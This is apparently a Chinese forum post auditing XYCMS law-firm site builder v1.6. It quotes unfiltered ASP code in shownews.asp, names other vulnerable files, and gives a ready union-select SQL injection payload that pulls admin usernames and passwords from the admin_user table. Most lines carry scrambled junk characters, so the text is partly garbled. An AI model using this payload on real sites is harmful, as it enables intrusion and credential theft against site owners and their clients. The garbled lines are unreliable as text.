前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, k8 u3 Q: V9 |7 n. L ' c4 i% v: C% o2 Q/ B
淫荡分割线
$ t8 t F, ~3 {- `% x3 D5 e# N5 m3 c--------------------------------------------------------
; d5 Y) S: \4 s/ @" t, r + k7 w! I b. ?* I, L# b
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
) s6 T n' @! y; S5 a: {源码地址:http://down.chinaz.com/soft/29233.htm
5 U' F; g7 i3 i7 W ! S n' E C$ r0 _, n+ C
漏洞文件:shownews.asp8 O6 m |) t+ I% H! w
漏洞代码:7-13行
1 `2 O- _; z; [: G ; c6 n. J1 f N& M) C
7 l" c" W" x1 _" M c3 ^" o<% & p- [9 ^3 J: ]* w* P
id=request.QueryString("id")
+ C* X+ u% X7 s- Z' {! d
# @: G, S) Q% n9 r6 e- u+ u, Z, [# jset snews=server.createobject("adodb.recordset")
6 g6 o$ N; w: o/ |exec="select * from [news] where id="&id( F6 y( s9 t! }) l) z+ w
snews.open exec,conn,1,1
t8 e) g& i! }; o% R& p+ U* E8 w%># s* T$ ^2 H% ` f% ]6 ]+ ]
( w: \) N# {$ p( H- w
$ E p! J# ^* @' V$ T什么过滤都没有 直造成注入" n/ K1 T% G% K" Q }
5 H5 x. a$ _8 Y7 r+ p3 _& w; y注入点:http://127.0.0.1:99/shownews.asp?id=xx
* m0 i8 U1 D7 p4 Q! Q: s - O! z# K( o% t5 C/ s/ t/ Y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找6 e) t: u. _" X8 }- \
; Y% Z, s/ X" m7 z( n" i3 a0 E. g
; i" R! m8 ^& z3 [$ B2 jexp: union select 1,admin,password,4,5,7 from admin_user: m9 s" S/ `9 w5 ^5 F) M# d* Y0 {
- u/ F% Y0 d0 _ |